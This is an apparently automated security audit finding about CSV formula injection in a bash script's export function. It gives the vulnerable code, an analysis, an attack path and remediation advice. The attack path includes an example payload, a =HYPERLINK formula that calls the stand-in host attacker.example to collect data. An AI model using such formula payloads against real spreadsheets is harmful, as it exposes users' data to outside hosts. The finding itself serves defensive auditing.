T09 · Insecure Skill Coding Practices
- Location
scripts/script.sh:77- Finding
CSV Formula Injection in Exported User Entries
- Content
View full analysis
Vulnerability Details
File Location:
scripts/script.sh, lines 77-83
Vulnerability Type: CSV formula injection caused by insufficient output encoding
Risk Level: MediumVulnerable Code
bash csv) echo "type,time,value" > "$out" for f in "$DATA_DIR"/*.log; do [ -f "$f" ] || continue local name=$(basename "$f" .log) while IFS='|' read -r ts val; do echo "$name,$ts,$val" >> "$out"The
valvariable contains user-controlled entry text. It is written directly to a CSV field without quoting, escaping, or neutralizing spreadsheet formula prefixes.Technical Analysis
Spreadsheet applications may interpret cells beginning with characters such as
=,+,-, or@as formulas rather than plain text. Because every entry command permits arbitrary text and_exportwrites that text directly toexport.csv, an attacker can create a stored entry containing a malicious spreadsheet formula.The export logic also fails to apply RFC 4180 CSV escaping. Commas, quotation marks, and line breaks in an entry can alter the CSV column or record structure, making it easier to position attacker-controlled content in a formula-capable cell.
Formula execution behavior depends on the spreadsheet application and its security configuration. Possible formula effects include initiating external requests, exposing spreadsheet data through attacker-controlled URLs, misleading the user with manipulated content, or invoking other spreadsheet-specific functionality.
Attack Path
-
An attacker supplies or persuades the user to record an entry whose first character is a spreadsheet formula prefix. For example:
bash outline add '=HYPERLINK("https://attacker.example/collect","Open report")' -
The script stores the value in
~/.local/share/outline/add.log. -
The user runs:
bash outline export csv
...[truncated 887 chars]
-
- Remediation
View remediation
Remediation Suggestions
Implement a dedicated CSV-encoding function for every field:
- Escape embedded double quotes by replacing each
"with"". - Enclose every field in double quotes.
- Neutralize fields whose first non-whitespace character is
=,+,-, or@, for example by prefixing a single quote. - Apply the protection to all fields, including
name,ts, andval. - Add tests covering formulas, commas, quotes, carriage returns, and line breaks.
- Document that exported files may contain untrusted content and should be imported with formula evaluation disabled.
A safer implementation should generate records using a well-tested CSV serializer where possible. If Bash must be retained, use an explicit encoding function and
printfrather than concatenating fields withecho.- Escape embedded double quotes by replacing each
